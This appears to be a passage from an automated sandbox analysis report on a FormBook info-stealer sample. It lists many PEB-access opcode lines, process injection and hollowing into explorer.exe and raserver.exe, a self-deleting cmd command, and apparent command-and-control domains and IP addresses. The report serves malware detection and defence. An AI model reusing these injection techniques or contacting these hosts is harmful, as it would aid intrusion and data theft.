          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019EFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019836CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01998EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A0FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A28ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019676E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019816E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0195C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0195C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0195C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01988E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A0FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A11608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0195E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01967E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01967E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01967E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01967E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01967E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01967E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A1AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A1AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0196766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B1849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B86CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B86CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B86CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BD8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B3BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BD740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BD740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BD740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B86C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B86C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B86C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B86C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B3AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B3AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B3AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B3AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B3AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B3AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B3AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B3AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B3AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B3AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B3AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B2746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B9C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B9C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B3A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B31DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B31DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B31DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BD05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BD05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B335A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B3FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B3FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B32581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B32581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B32581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B32581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B02D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B02D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B02D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B02D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B02D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BB8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B1D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B1D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BCFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BCFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BCFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BCFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B86DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B86DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B86DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B86DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B86DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B86DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B0AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BCE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B34D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B34D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B34D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BD8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B8A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B2C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B2C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B27D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B43D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B83540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BB3D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BD0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BD0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BD0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B846A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B9FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B316E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B176E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BD8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B48EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BBFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B336CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BBFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B0E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B3A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B3A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B0C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B0C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B0C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B38E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B2AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B2AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B2AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B2AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B2AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B1766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B17E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B17E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B17E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B17E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B17E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B17E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BCAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BCAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B18794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B87794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B87794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B87794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B437F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B3E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B2B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B2B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B04F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B04F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B2F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B9FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\raserver.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.gentrypartyof8.com
          Source: C:\Windows\explorer.exeDomain query: www.rsyueda.com
          Source: C:\Windows\explorer.exeNetwork Connect: 23.82.229.132 80
          Source: C:\Windows\explorer.exeNetwork Connect: 66.235.200.146 80
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeSection loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeSection loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\raserver.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\raserver.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeThread register set: target process: 3424
          Source: C:\Windows\SysWOW64\raserver.exeThread register set: target process: 3424
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeSection unmapped: C:\Windows\SysWOW64\raserver.exe base address: 1370000
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess created: C:\Users\user\Desktop\XhU4EXUp0x.exe C:\Users\user\Desktop\XhU4EXUp0x.exe
          Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\XhU4EXUp0x.exe'
          Source: explorer.exe, 00000005.00000000.657818054.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
          Source: explorer.exe, 00000005.00000000.689362346.0000000001080000.00000002.00000001.sdmp, raserver.exe, 0000000C.00000002.912634794.0000000003390000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000005.00000000.669694519.0000000005E50000.00000004.00000001.sdmp, raserver.exe, 0000000C.00000002.912634794.0000000003390000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.689362346.0000000001080000.00000002.00000001.sdmp, raserver.exe, 0000000C.00000002.912634794.0000000003390000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.689362346.0000000001080000.00000002.00000001.sdmp, raserver.exe, 0000000C.00000002.912634794.0000000003390000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000005.00000000.677547132.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeQueries volume information: C:\Users\user\Desktop\XhU4EXUp0x.exe VolumeInformation
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000003.00000002.707404802.00000000015D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.652221131.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.911907238.0000000000A90000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.912137473.0000000000E80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.912162573.0000000000EB0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.655856649.00000000037F7000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.706990052.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.654291332.00000000036B9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.707426607.0000000001600000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.2.XhU4EXUp0x.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.XhU4EXUp0x.exe.400000.1.raw.unpack, type: UNPACKEDPE
